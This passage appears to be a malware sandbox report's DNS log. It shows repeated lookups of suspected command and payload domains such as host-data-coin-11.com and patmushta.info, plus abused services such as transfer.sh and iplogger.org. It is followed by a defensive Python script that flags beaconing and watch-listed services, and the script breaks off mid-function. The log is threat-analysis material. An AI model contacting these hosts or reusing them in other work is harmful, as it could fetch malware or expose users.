Jan 14, 2022 20:29:53.218890905 CET | 192.168.2.4 | 8.8.8.8 | 0xdf9 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 20:29:53.380956888 CET | 192.168.2.4 | 8.8.8.8 | 0xbc85 | Standard query (0) | goo.su | A (IP address) | IN (0x0001)
Jan 14, 2022 20:29:53.825635910 CET | 192.168.2.4 | 8.8.8.8 | 0xc6ed | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 20:29:54.002545118 CET | 192.168.2.4 | 8.8.8.8 | 0xafa7 | Standard query (0) | transfer.sh | A (IP address) | IN (0x0001)
Jan 14, 2022 20:29:54.220135927 CET | 192.168.2.4 | 8.8.8.8 | 0xce80 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 20:29:54.391541004 CET | 192.168.2.4 | 8.8.8.8 | 0x66db | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 20:29:54.554003000 CET | 192.168.2.4 | 8.8.8.8 | 0x75ac | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 20:29:54.713959932 CET | 192.168.2.4 | 8.8.8.8 | 0x81b7 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 20:29:54.879584074 CET | 192.168.2.4 | 8.8.8.8 | 0x3011 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 20:30:02.214329958 CET | 192.168.2.4 | 8.8.8.8 | 0x5c1a | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 20:30:02.380536079 CET | 192.168.2.4 | 8.8.8.8 | 0xee93 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 20:30:04.107853889 CET | 192.168.2.4 | 8.8.8.8 | 0xa06f | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 20:30:04.271703959 CET | 192.168.2.4 | 8.8.8.8 | 0xce9b | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 20:30:04.445702076 CET | 192.168.2.4 | 8.8.8.8 | 0x87ab | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 20:30:04.621660948 CET | 192.168.2.4 | 8.8.8.8 | 0x4535 | Standard query (0) | transfer.sh | A (IP address) | IN (0x0001)
Jan 14, 2022 20:30:11.996265888 CET | 192.168.2.4 | 8.8.8.8 | 0xcf0a | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 20:30:12.182595968 CET | 192.168.2.4 | 8.8.8.8 | 0xbcea | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 20:30:12.377898932 CET | 192.168.2.4 | 8.8.8.8 | 0x475c | Standard query (0) | data-host-coin-8.com | A (IP address) | IN (0x0001)
Jan 14, 2022 20:30:17.901901960 CET | 192.168.2.4 | 8.8.8.8 | 0xe8c | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 20:30:18.180469036 CET | 192.168.2.4 | 8.8.8.8 | 0x2817 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 20:30:18.268348932 CET | 192.168.2.4 | 8.8.8.8 | 0xfb9d | Standard query (0) | patmushta.info | A (IP address) | IN (0x0001)
Jan 14, 2022 20:30:18.416841030 CET | 192.168.2.4 | 8.8.8.8 | 0xe2eb | Standard query (0) | data-host-coin-8.com | A (IP address) | IN (0x0001)
Jan 14, 2022 20:30:20.727615118 CET | 192.168.2.4 | 8.8.8.8 | 0xf1ed | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 20:30:20.905186892 CET | 192.168.2.4 | 8.8.8.8 | 0x38f1 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 20:30:23.109894991 CET | 192.168.2.4 | 8.8.8.8 | 0xcf31 | Standard query (0) | iplogger.org | A (IP address) | IN (0x0001)
Jan 14, 2022 20:30:27.657519102 CET | 192.168.2.4 | 8.8.8.8 | 0x803b | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 20:30:27.846710920 CET | 192.168.2.4 | 8.8.8.8 | 0x4d74 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 20:30:28.016140938 CET | 192.168.2.4 | 8.8.8.8 | 0xdb9b | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 20:30:28.256848097 CET | 192.168.2.4 | 8.8.8.8 | 0xfaf7 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 20:30:28.459739923 CET | 192.168.2.4 | 8.8.8.8 | 0x78e4 | Standard query (0) | transfer.sh | A (IP address) | IN (0x0001)
Jan 14, 2022 20:30:28.469984055 CET | 192.168.2.4 | 8.8.8.8 | 0xcb6 | Standard query (0) | iplogger.org | A (IP address) | IN (0x0001)
Jan 14, 2022 20:30:31.864511967 CET | 192.168.2.4 | 8.8.8.8 | 0xa7eb | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 20:30:32.156472921 CET | 192.168.2.4 | 8.8.8.8 | 0xe5f1 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 20:30:32.393162012 CET | 192.168.2.4 | 8.8.8.8 | 0xcd5e | Standard query (0) | transfer.sh | A (IP address) | IN (0x0001)
Jan 14, 2022 20:30:34.850267887 CET | 192.168.2.4 | 8.8.8.8 | 0xef5d | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 20:30:35.069546938 CET | 192.168.2.4 | 8.8.8.8 | 0xe884 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 20:30:35.279342890 CET | 192.168.2.4 | 8.8.8.8 | 0xd4ee | Standard query (0) | transfer.sh | A (IP address) | IN (0x0001)
Jan 14, 2022 20:30:35.785237074 CET | 192.168.2.4 | 8.8.8.8 | 0x7bd0 | Standard query (0) | microsoft-com.mail.protection.outlook.com | A (IP address) | IN (0x0001)
Jan 14, 2022 20:30:42.930880070 CET | 192.168.2.4 | 8.8.8.8 | 0x2726 | Standard query (0) | cdn.discordapp.com | A (IP address) | IN (0x0001)
Jan 14, 2022 20:30:44.214027882 CET | 192.168.2.4 | 8.8.8.8 | 0x3fe1 | Standard query (0) | github.com | A (IP address) | IN (0x0001)
Jan 14, 2022 20:30:44.502847910 CET | 192.168.2.4 | 8.8.8.8 | 0xc3 | Standard query (0) | raw.githubusercontent.com | A (IP address) | IN (0x0001)
Jan 14, 2022 20:30:48.241736889 CET | 192.168.2.4 | 8.8.8.8 | 0xee5a | Standard query (0) | transfer.sh | A (IP address) | IN (0x0001)
Jan 14, 2022 20:31:08.601046085 CET | 192.168.2.4 | 8.8.8.8 | 0x1b20 | Standard query (0) | patmushta.info | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jan 14, 2022 20:29:10.019198895 CET | 8.8.8.8 | 192.168.2.4 | 0xc52 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:29:10.490426064 CET | 8.8.8.8 | 192.168.2.4 | 0x50b7 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:29:10.660072088 CET | 8.8.8.8 | 192.168.2.4 | 0xc074 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:29:10.833611012 CET | 8.8.8.8 | 192.168.2.4 | 0xdff0 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:29:11.001287937 CET | 8.8.8.8 | 192.168.2.4 | 0x1085 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:29:11.183374882 CET | 8.8.8.8 | 192.168.2.4 | 0xa4aa | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:29:12.869715929 CET | 8.8.8.8 | 192.168.2.4 | 0xa259 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:29:13.305824041 CET | 8.8.8.8 | 192.168.2.4 | 0x778e | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:29:13.490113020 CET | 8.8.8.8 | 192.168.2.4 | 0x833b | No error (0) | data-host-coin-8.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:29:15.180360079 CET | 8.8.8.8 | 192.168.2.4 | 0x3a22 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:29:15.349201918 CET | 8.8.8.8 | 192.168.2.4 | 0xd7c9 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:29:15.812786102 CET | 8.8.8.8 | 192.168.2.4 | 0x4bcf | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:29:16.087862968 CET | 8.8.8.8 | 192.168.2.4 | 0xa142 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:29:16.274111032 CET | 8.8.8.8 | 192.168.2.4 | 0x4c77 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:29:16.533947945 CET | 8.8.8.8 | 192.168.2.4 | 0x81eb | No error (0) | unicupload.top | | 54.38.220.85 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:29:16.602067947 CET | 8.8.8.8 | 192.168.2.4 | 0xc787 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:29:16.773143053 CET | 8.8.8.8 | 192.168.2.4 | 0x40fb | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:29:17.236701965 CET | 8.8.8.8 | 192.168.2.4 | 0xca44 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:29:17.402679920 CET | 8.8.8.8 | 192.168.2.4 | 0x863 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:29:17.859249115 CET | 8.8.8.8 | 192.168.2.4 | 0x9726 | No error (0) | data-host-coin-8.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:29:19.439167023 CET | 8.8.8.8 | 192.168.2.4 | 0x96a6 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:29:19.616394997 CET | 8.8.8.8 | 192.168.2.4 | 0xe326 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:29:19.801878929 CET | 8.8.8.8 | 192.168.2.4 | 0x1a4e | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:29:20.159404039 CET | 8.8.8.8 | 192.168.2.4 | 0x4a7f | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:29:23.372855902 CET | 8.8.8.8 | 192.168.2.4 | 0x10bc | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:29:23.540100098 CET | 8.8.8.8 | 192.168.2.4 | 0xaddd | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:29:23.738399982 CET | 8.8.8.8 | 192.168.2.4 | 0x5f8e | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:29:23.921998978 CET | 8.8.8.8 | 192.168.2.4 | 0x1acd | No error (0) | cdn.discordapp.com | | 162.159.135.233 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:29:23.921998978 CET | 8.8.8.8 | 192.168.2.4 | 0x1acd | No error (0) | cdn.discordapp.com | | 162.159.134.233 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:29:23.921998978 CET | 8.8.8.8 | 192.168.2.4 | 0x1acd | No error (0) | cdn.discordapp.com | | 162.159.133.233 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:29:23.921998978 CET | 8.8.8.8 | 192.168.2.4 | 0x1acd | No error (0) | cdn.discordapp.com | | 162.159.129.233 | A (IP address) | IN (0x0001)
                                            Jan 14, 2022 20:29:23.921998978 CET8.8.8.8192.168.2.40x1acdNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:25.495446920 CET8.8.8.8192.168.2.40xf661No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:25.683790922 CET8.8.8.8192.168.2.40x14c4No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:25.859040022 CET8.8.8.8192.168.2.40xe7cbNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:35.107043982 CET8.8.8.8192.168.2.40x9952No error (0)microsoft-com.mail.protection.outlook.com104.47.53.36A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:35.107043982 CET8.8.8.8192.168.2.40x9952No error (0)microsoft-com.mail.protection.outlook.com40.93.207.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:35.107043982 CET8.8.8.8192.168.2.40x9952No error (0)microsoft-com.mail.protection.outlook.com40.93.212.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:35.107043982 CET8.8.8.8192.168.2.40x9952No error (0)microsoft-com.mail.protection.outlook.com40.93.207.1A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:35.107043982 CET8.8.8.8192.168.2.40x9952No error (0)microsoft-com.mail.protection.outlook.com52.101.24.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:35.107043982 CET8.8.8.8192.168.2.40x9952No error (0)microsoft-com.mail.protection.outlook.com104.47.54.36A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:37.789823055 CET8.8.8.8192.168.2.40x3059No error (0)patmushta.info94.142.143.116A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:47.210695982 CET8.8.8.8192.168.2.40x55eaNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:47.657924891 CET8.8.8.8192.168.2.40x7678No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:47.839870930 CET8.8.8.8192.168.2.40xcf52No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:48.020026922 CET8.8.8.8192.168.2.40xbff0No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:48.191282988 CET8.8.8.8192.168.2.40xa2f1No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:48.403235912 CET8.8.8.8192.168.2.40x8df1No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:48.596955061 CET8.8.8.8192.168.2.40x4328No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:48.779263020 CET8.8.8.8192.168.2.40xfe2bNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:48.975230932 CET8.8.8.8192.168.2.40xd0No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:49.159852028 CET8.8.8.8192.168.2.40x4039No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:49.325958967 CET8.8.8.8192.168.2.40xa0aaNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:49.493980885 CET8.8.8.8192.168.2.40xc6d3No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:49.676035881 CET8.8.8.8192.168.2.40x8431No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:49.849984884 CET8.8.8.8192.168.2.40x8d3dNo error (0)data-host-coin-8.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:53.075565100 CET8.8.8.8192.168.2.40xee16No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:53.237838984 CET8.8.8.8192.168.2.40xdf9No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:53.404228926 CET8.8.8.8192.168.2.40xbc85No error (0)goo.su172.67.139.105A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:53.404228926 CET8.8.8.8192.168.2.40xbc85No error (0)goo.su104.21.38.221A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:53.844762087 CET8.8.8.8192.168.2.40xc6edNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:54.020250082 CET8.8.8.8192.168.2.40xafa7No error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:54.239521980 CET8.8.8.8192.168.2.40xce80No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:54.408709049 CET8.8.8.8192.168.2.40x66dbNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:54.573277950 CET8.8.8.8192.168.2.40x75acNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:54.733412027 CET8.8.8.8192.168.2.40x81b7No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:54.896519899 CET8.8.8.8192.168.2.40x3011No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:02.233520031 CET8.8.8.8192.168.2.40x5c1aNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:02.399200916 CET8.8.8.8192.168.2.40xee93No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:04.127019882 CET8.8.8.8192.168.2.40xa06fNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:04.290981054 CET8.8.8.8192.168.2.40xce9bNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:04.464379072 CET8.8.8.8192.168.2.40x87abNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:04.640945911 CET8.8.8.8192.168.2.40x4535No error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:12.016377926 CET8.8.8.8192.168.2.40xcf0aNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:12.201699972 CET8.8.8.8192.168.2.40xbceaNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:12.395394087 CET8.8.8.8192.168.2.40x475cNo error (0)data-host-coin-8.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:17.920705080 CET8.8.8.8192.168.2.40xe8cNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:18.199744940 CET8.8.8.8192.168.2.40x2817No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:18.287906885 CET8.8.8.8192.168.2.40xfb9dNo error (0)patmushta.info94.142.143.116A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:18.434205055 CET8.8.8.8192.168.2.40xe2ebNo error (0)data-host-coin-8.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:20.746655941 CET8.8.8.8192.168.2.40xf1edNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:20.923949003 CET8.8.8.8192.168.2.40x38f1No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:23.129528046 CET8.8.8.8192.168.2.40xcf31No error (0)iplogger.org148.251.234.83A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:27.675003052 CET8.8.8.8192.168.2.40x803bNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:27.865788937 CET8.8.8.8192.168.2.40x4d74No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:28.032931089 CET8.8.8.8192.168.2.40xdb9bNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:28.275589943 CET8.8.8.8192.168.2.40xfaf7No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:28.478533983 CET8.8.8.8192.168.2.40x78e4No error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:28.489126921 CET8.8.8.8192.168.2.40xcb6No error (0)iplogger.org148.251.234.83A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:31.883305073 CET8.8.8.8192.168.2.40xa7ebNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:32.173628092 CET8.8.8.8192.168.2.40xe5f1No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:32.412640095 CET8.8.8.8192.168.2.40xcd5eNo error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:34.867557049 CET8.8.8.8192.168.2.40xef5dNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:35.089627981 CET8.8.8.8192.168.2.40xe884No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:35.296699047 CET8.8.8.8192.168.2.40xd4eeNo error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:35.804399967 CET8.8.8.8192.168.2.40x7bd0No error (0)microsoft-com.mail.protection.outlook.com40.93.207.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:35.804399967 CET8.8.8.8192.168.2.40x7bd0No error (0)microsoft-com.mail.protection.outlook.com40.93.212.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:35.804399967 CET8.8.8.8192.168.2.40x7bd0No error (0)microsoft-com.mail.protection.outlook.com40.93.207.1A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:35.804399967 CET8.8.8.8192.168.2.40x7bd0No error (0)microsoft-com.mail.protection.outlook.com104.47.53.36A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:35.804399967 CET8.8.8.8192.168.2.40x7bd0No error (0)microsoft-com.mail.protection.outlook.com104.47.54.36A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:35.804399967 CET8.8.8.8192.168.2.40x7bd0No error (0)microsoft-com.mail.protection.outlook.com52.101.24.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:42.953994989 CET8.8.8.8192.168.2.40x2726No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:42.953994989 CET8.8.8.8192.168.2.40x2726No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:42.953994989 CET8.8.8.8192.168.2.40x2726No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:42.953994989 CET8.8.8.8192.168.2.40x2726No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:42.953994989 CET8.8.8.8192.168.2.40x2726No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:44.238307953 CET8.8.8.8192.168.2.40x3fe1No error (0)github.com140.82.121.4A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:44.521907091 CET8.8.8.8192.168.2.40xc3No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:44.521907091 CET8.8.8.8192.168.2.40xc3No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:44.521907091 CET8.8.8.8192.168.2.40xc3No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:44.521907091 CET8.8.8.8192.168.2.40xc3No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:48.260907888 CET8.8.8.8192.168.2.40xee5aNo error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:31:08.620507956 CET8.8.8.8192.168.2.40x1b20No error (0)patmushta.info94.142.143.116A (IP address)IN (0x0001)
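Two things in the DNS answers above are worth turning into detection logic rather than reading by eye: host-data-coin-11.com is re-resolved every few hundred milliseconds for the whole run (a retry or beacon loop), and it shares its answer address 8.209.70.0 with data-host-coin-8.com, so the two names are one piece of infrastructure. The script below is an added example and is not part of the Joe Sandbox report; it runs those checks over a subset of the rows above, transcribed into a pipe-delimited string (constructed input, not the full table). The beacon thresholds and the watch-list of commonly abused file-hosting and IP-check services are this example's own assumptions.

```python
from collections import defaultdict
from datetime import datetime
from statistics import median

# Constructed input: a subset of the rows from the DNS answers table above,
# transcribed as "timestamp | name | address". Not the full table.
DNS_ROWS = """\
Jan 14, 2022 20:29:13.305824041 | host-data-coin-11.com | 8.209.70.0
Jan 14, 2022 20:29:13.490113020 | data-host-coin-8.com | 8.209.70.0
Jan 14, 2022 20:29:15.180360079 | host-data-coin-11.com | 8.209.70.0
Jan 14, 2022 20:29:15.349201918 | host-data-coin-11.com | 8.209.70.0
Jan 14, 2022 20:29:15.812786102 | host-data-coin-11.com | 8.209.70.0
Jan 14, 2022 20:29:16.087862968 | host-data-coin-11.com | 8.209.70.0
Jan 14, 2022 20:29:16.274111032 | host-data-coin-11.com | 8.209.70.0
Jan 14, 2022 20:29:16.533947945 | unicupload.top | 54.38.220.85
Jan 14, 2022 20:29:16.602067947 | host-data-coin-11.com | 8.209.70.0
Jan 14, 2022 20:29:16.773143053 | host-data-coin-11.com | 8.209.70.0
Jan 14, 2022 20:29:17.236701965 | host-data-coin-11.com | 8.209.70.0
Jan 14, 2022 20:29:17.402679920 | host-data-coin-11.com | 8.209.70.0
Jan 14, 2022 20:29:17.859249115 | data-host-coin-8.com | 8.209.70.0
Jan 14, 2022 20:29:23.921998978 | cdn.discordapp.com | 162.159.135.233
Jan 14, 2022 20:29:23.921998978 | cdn.discordapp.com | 162.159.134.233
Jan 14, 2022 20:29:37.789823055 | patmushta.info | 94.142.143.116
Jan 14, 2022 20:29:54.020250082 | transfer.sh | 144.76.136.153
Jan 14, 2022 20:30:23.129528046 | iplogger.org | 148.251.234.83
Jan 14, 2022 20:30:28.478533983 | transfer.sh | 144.76.136.153
Jan 14, 2022 20:30:28.489126921 | iplogger.org | 148.251.234.83
"""

# Legitimate services that commodity stealers routinely use as payload hosts,
# redirectors or IP-check endpoints. Assumed watch-list, not taken from the report.
ABUSED_SERVICES = {"transfer.sh", "cdn.discordapp.com", "raw.githubusercontent.com",
                   "iplogger.org", "goo.su"}


def parse_ts(text):
    # The sandbox prints nanoseconds; strptime's %f accepts at most six digits.
    head, frac = text.split(".")
    return datetime.strptime(f"{head}.{frac[:6]}", "%b %d, %Y %H:%M:%S.%f")


def parse_rows(text):
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, name, addr = (field.strip() for field in line.split("|"))
        rows.append((parse_ts(ts), name, addr))
    return rows


def query_stats(rows):
    """Per name: distinct queries, answer addresses, median gap in seconds between queries."""
    times = defaultdict(set)   # a multi-answer response repeats one timestamp: count it once
    addrs = defaultdict(set)
    for ts, name, addr in rows:
        times[name].add(ts)
        addrs[name].add(addr)
    stats = {}
    for name, stamps in times.items():
        ordered = sorted(stamps)
        gaps = [(b - a).total_seconds() for a, b in zip(ordered, ordered[1:])]
        stats[name] = {
            "queries": len(ordered),
            "addresses": sorted(addrs[name]),
            "median_gap": median(gaps) if gaps else None,
        }
    return stats


def flag_beacons(stats, min_queries=5, max_median_gap=2.0):
    """Names re-resolved many times at short intervals: a retry or beacon loop."""
    return sorted(
        name for name, s in stats.items()
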